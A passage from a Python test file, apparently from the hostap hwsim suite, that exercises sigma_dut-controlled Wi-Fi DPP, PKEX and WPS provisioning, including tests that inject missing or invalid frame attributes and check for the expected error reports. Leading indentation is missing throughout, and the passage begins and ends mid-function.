res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6")
t.join()
if "ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/1 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id1 = int(res)
uri1 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id1)
res = dev[0].request("DPP_QR_CODE " + uri1)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id0b = int(res)
dev[1].set("dpp_config_processing", "2")
cmd = "DPP_LISTEN 2412"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
cmd = "DPP_AUTH_INIT peer=%d conf=%s %s configurator=%d" % (id0b, sta_conf, extra, conf_id)
if "OK" not in dev[0].request(cmd):
raise Exception("Failed to initiate DPP Authentication")
dev[1].wait_connected()
sigma_dut_cmd_check("ap_reset_default")
finally:
dev[1].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_ap_dpp_pkex_responder(dev, apdev, params):
"""sigma_dut controlled AP as DPP PKEX responder"""
check_dpp_capab(dev[0])
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_dpp_pkex_responder.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_dpp_pkex_responder(dev, apdev)
finally:
stop_sigma_dut(sigma)
def dpp_init_conf_pkex(dev, conf_id, check_config=True):
logger.info("Starting DPP PKEX initiator/configurator in a thread")
time.sleep(1.5)
cmd = "DPP_BOOTSTRAP_GEN type=pkex"
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id = int(res)
cmd = "DPP_PKEX_ADD own=%d init=1 conf=ap-dpp configurator=%d code=password" % (id, conf_id)
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to initiate DPP PKEX")
if not check_config:
return
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP initiator/configurator done")
def run_sigma_dut_ap_dpp_pkex_responder(dev, apdev):
sigma_dut_cmd_check("ap_reset_default,program,DPP")
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[0].request(cmd);
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
t = threading.Thread(target=dpp_init_conf_pkex, args=(dev[0], conf_id))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,PKEX,DPPPKEXCode,password,DPPTimeout,6,DPPWaitForConnect,No", timeout=10)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
sigma_dut_cmd_check("ap_reset_default")
def test_sigma_dut_dpp_pkex_responder_proto(dev, apdev):
"""sigma_dut controlled STA as DPP PKEX responder and error case"""
check_dpp_capab(dev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_pkex_responder_proto(dev, apdev)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_pkex_responder_proto(dev, apdev):
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[1].request(cmd);
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
dev[1].set("dpp_test", "44")
t = threading.Thread(target=dpp_init_conf_pkex, args=(dev[1], conf_id,
False))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPProvisioningRole,Enrollee,DPPBS,PKEX,DPPPKEXCode,password,DPPTimeout,6", timeout=10)
t.join()
if "BootstrapResult,Timeout" not in res:
raise Exception("Unexpected result: " + res)
def dpp_proto_init(dev, id1):
time.sleep(1)
logger.info("Starting DPP initiator/configurator in a thread")
cmd = "DPP_CONFIGURATOR_ADD"
res = dev.request(cmd);
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
cmd = "DPP_AUTH_INIT peer=%d conf=sta-dpp configurator=%d" % (id1, conf_id)
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
def test_sigma_dut_dpp_proto_initiator(dev, apdev):
"""sigma_dut DPP protocol testing - Initiator"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [ ("InvalidValue", "AuthenticationRequest", "WrappedData",
"BootstrapResult,OK,AuthResult,Errorsent",
None),
("InvalidValue", "AuthenticationConfirm", "WrappedData",
"BootstrapResult,OK,AuthResult,Errorsent",
None),
("MissingAttribute", "AuthenticationRequest", "InitCapabilities",
"BootstrapResult,OK,AuthResult,Errorsent",
"Missing or invalid I-capabilities"),
("InvalidValue", "AuthenticationConfirm", "InitAuthTag",
"BootstrapResult,OK,AuthResult,Errorsent",
"Mismatching Initiator Authenticating Tag"),
("MissingAttribute", "ConfigurationResponse", "EnrolleeNonce",
"BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent",
"Missing or invalid Enrollee Nonce attribute") ]
for step, frame, attr, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_initiator(dev, step, frame, attr, result,
fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_initiator(dev, step, frame, attr, result, fail):
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr),
timeout=10)
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly: " + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_responder(dev, apdev):
"""sigma_dut DPP protocol testing - Responder"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [ ("MissingAttribute", "AuthenticationResponse", "DPPStatus",
"BootstrapResult,OK,AuthResult,Errorsent",
"Missing or invalid required DPP Status attribute"),
("MissingAttribute", "ConfigurationRequest", "EnrolleeNonce",
"BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent",
"Missing or invalid Enrollee Nonce attribute") ]
for step, frame, attr, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_responder(dev, step, frame, attr, result,
fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_responder(dev, step, frame, attr, result, fail):
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = hex.decode('hex')
logger.info("URI from sigma_dut: " + uri)
res = dev[1].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id1 = int(res)
t = threading.Thread(target=dpp_proto_init, args=(dev[1], id1))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr), timeout=10)
t.join()
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly:" + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_stop_at_initiator(dev, apdev):
"""sigma_dut DPP protocol testing - Stop at RX on Initiator"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [ ("AuthenticationResponse",
"BootstrapResult,OK,AuthResult,Errorsent",
None),
("ConfigurationRequest",
"BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent",
None)]
for frame, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_stop_at_initiator(dev, frame, result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_stop_at_initiator(dev, frame, result, fail):
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame))
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly: " + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, apdev):
"""sigma_dut DPP protocol testing - Stop at TX on Initiator/Enrollee"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [ ("AuthenticationConfirm",
"BootstrapResult,OK,AuthResult,Errorsent,LastFrameReceived,AuthenticationResponse",
None) ]
for frame, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname, debug=True)
try:
run_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, frame,
result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, frame, result,
fail):
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame), timeout=10)
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly: " + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_stop_at_responder(dev, apdev):
"""sigma_dut DPP protocol testing - Stop at RX on Responder"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [ ("AuthenticationRequest",
"BootstrapResult,OK,AuthResult,Errorsent",
None),
("AuthenticationConfirm",
"BootstrapResult,OK,AuthResult,Errorsent",
None) ]
for frame, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_stop_at_responder(dev, frame, result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_stop_at_responder(dev, frame, result, fail):
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = hex.decode('hex')
logger.info("URI from sigma_dut: " + uri)
res = dev[1].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id1 = int(res)
t = threading.Thread(target=dpp_proto_init, args=(dev[1], id1))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame), timeout=10)
t.join()
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly:" + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def dpp_proto_init_pkex(dev):
time.sleep(1)
logger.info("Starting DPP PKEX initiator/configurator in a thread")
cmd = "DPP_CONFIGURATOR_ADD"
res = dev.request(cmd);
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
cmd = "DPP_BOOTSTRAP_GEN type=pkex"
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id = int(res)
cmd = "DPP_PKEX_ADD own=%d init=1 conf=sta-dpp configurator=%d code=secret" % (id, conf_id)
if "FAIL" in dev.request(cmd):
raise Exception("Failed to initiate DPP PKEX")
def test_sigma_dut_dpp_proto_initiator_pkex(dev, apdev):
"""sigma_dut DPP protocol testing - Initiator (PKEX)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [ ("InvalidValue", "PKEXCRRequest", "WrappedData",
"BootstrapResult,Errorsent",
None),
("MissingAttribute", "PKEXExchangeRequest", "FiniteCyclicGroup",
"BootstrapResult,Errorsent",
"Missing or invalid Finite Cyclic Group attribute"),
("MissingAttribute", "PKEXCRRequest", "BSKey",
"BootstrapResult,Errorsent",
"No valid peer bootstrapping key found") ]
for step, frame, attr, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_initiator_pkex(dev, step, frame, attr,
result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_initiator_pkex(dev, step, frame, attr, result, fail):
cmd = "DPP_BOOTSTRAP_GEN type=pkex"
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id1 = int(res)
cmd = "DPP_PKEX_ADD own=%d code=secret" % (id1)
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to set PKEX data (responder)")
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCode,secret,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr))
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly: " + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_responder_pkex(dev, apdev):
"""sigma_dut DPP protocol testing - Responder (PKEX)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [ ("InvalidValue", "PKEXCRResponse", "WrappedData",
"BootstrapResult,Errorsent",
None),
("MissingAttribute", "PKEXExchangeResponse", "DPPStatus",
"BootstrapResult,Errorsent",
"No DPP Status attribute"),
("MissingAttribute", "PKEXCRResponse", "BSKey",
"BootstrapResult,Errorsent",
"No valid peer bootstrapping key found") ]
for step, frame, attr, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_responder_pkex(dev, step, frame, attr,
result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_responder_pkex(dev, step, frame, attr, result, fail):
t = threading.Thread(target=dpp_proto_init_pkex, args=(dev[1],))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCode,secret,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr), timeout=10)
t.join()
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly:" + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def init_sigma_dut_dpp_proto_peer_disc_req(dev, apdev):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg"
ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b"
params = { "ssid": "DPPNET01",
"wpa": "2",
"ieee80211w": "2",
"wpa_key_mgmt": "DPP",
"rsn_pairwise": "CCMP",
"dpp_connector": ap_connector,
"dpp_csign": csign_pub,
"dpp_netaccesskey": ap_netaccesskey }
try:
hapd = hostapd.add_ap(apdev[0], params)
except:
raise HwsimSkip("DPP not supported")
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd);
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % ("DPPNET01".encode("hex"), conf_id));
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
def test_sigma_dut_dpp_proto_peer_disc_req(dev, apdev):
"""sigma_dut DPP protocol testing - Peer Discovery Request"""
sigma = start_sigma_dut(dev[0].ifname)
try:
init_sigma_dut_dpp_proto_peer_disc_req(dev, apdev)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes,DPPStep,MissingAttribute,DPPFrameType,PeerDiscoveryRequest,DPPIEAttribute,TransactionID", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,Errorsent" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_self_config(dev, apdev):
"""sigma_dut DPP Configurator enrolling an AP and using self-configuration"""
check_dpp_capab(dev[0])
hapd = hostapd.add_ap(apdev[0], { "ssid": "unconfigured" })
check_dpp_capab(hapd)
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
addr = hapd.own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/1 mac=" + addr
res = hapd.request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id = int(res)
uri = hapd.request("DPP_BOOTSTRAP_GET_URI %d" % id)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,AP,DPPBS,QR,DPPTimeout,6")
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
update_hapd_config(hapd)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPCryptoIdentifier,P-256,DPPBS,QR,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPAuthDirection,Single,DPPConfIndex,1,DPPTimeout,6,DPPWaitForConnect,Yes,DPPSelfConfigure,Yes"
res = sigma_dut_cmd(cmd, timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
dev[0].set("dpp_config_processing", "0")
def test_sigma_dut_ap_dpp_self_config(dev, apdev, params):
"""sigma_dut DPP AP Configurator using self-configuration"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_dpp_self_config.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_dpp_self_config(dev, apdev)
finally:
stop_sigma_dut(sigma)
dev[0].set("dpp_config_processing", "0")
def run_sigma_dut_ap_dpp_self_config(dev, apdev):
check_dpp_capab(dev[0])
sigma_dut_cmd_check("ap_reset_default,program,DPP")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,AP,DPPBS,QR,DPPConfIndex,1,DPPSelfConfigure,Yes,DPPTimeout,6", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
dev[0].set("dpp_config_processing", "2")
addr = dev[0].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/11 mac=" + addr
res = dev[0].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id = int(res)
uri = dev[0].request("DPP_BOOTSTRAP_GET_URI %d" % id)
cmd = "DPP_LISTEN 2462 role=enrollee"
if "OK" not in dev[0].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6"
res = sigma_dut_cmd(cmd)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
dev[0].wait_connected()
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
sigma_dut_cmd_check("ap_reset_default")
def test_sigma_dut_preconfigured_profile(dev, apdev):
"""sigma_dut controlled connection using preconfigured profile"""
try:
run_sigma_dut_preconfigured_profile(dev, apdev)
finally:
dev[0].set("ignore_old_scan_res", "0")
def run_sigma_dut_preconfigured_profile(dev, apdev):
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
params = hostapd.wpa2_params(ssid="test-psk", passphrase="12345678")
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-psk", psk="12345678", scan_freq="2412",
only_add_network=True)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s" % (ifname, "test-psk"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_wps_pbc(dev, apdev):
"""sigma_dut and WPS PBC Enrollee"""
try:
run_sigma_dut_wps_pbc(dev, apdev)
finally:
dev[0].set("ignore_old_scan_res", "0")
def run_sigma_dut_wps_pbc(dev, apdev):
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": "wps", "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" })
hapd.request("WPS_PBC")
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
cmd = "start_wps_registration,interface,%s" % ifname
cmd += ",WpsRole,Enrollee"
cmd += ",WpsConfigMethod,PBC"
sigma_dut_cmd_check(cmd, timeout=15)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
hapd.disable()
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
dev[0].flush_scan_cache()
def test_sigma_dut_sta_scan_bss(dev, apdev):
"""sigma_dut sta_scan_bss"""
hapd = hostapd.add_ap(apdev[0], { "ssid": "test" })
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "sta_scan_bss,Interface,%s,BSSID,%s" % (dev[0].ifname, \
hapd.own_addr())
res = sigma_dut_cmd(cmd, timeout=10)
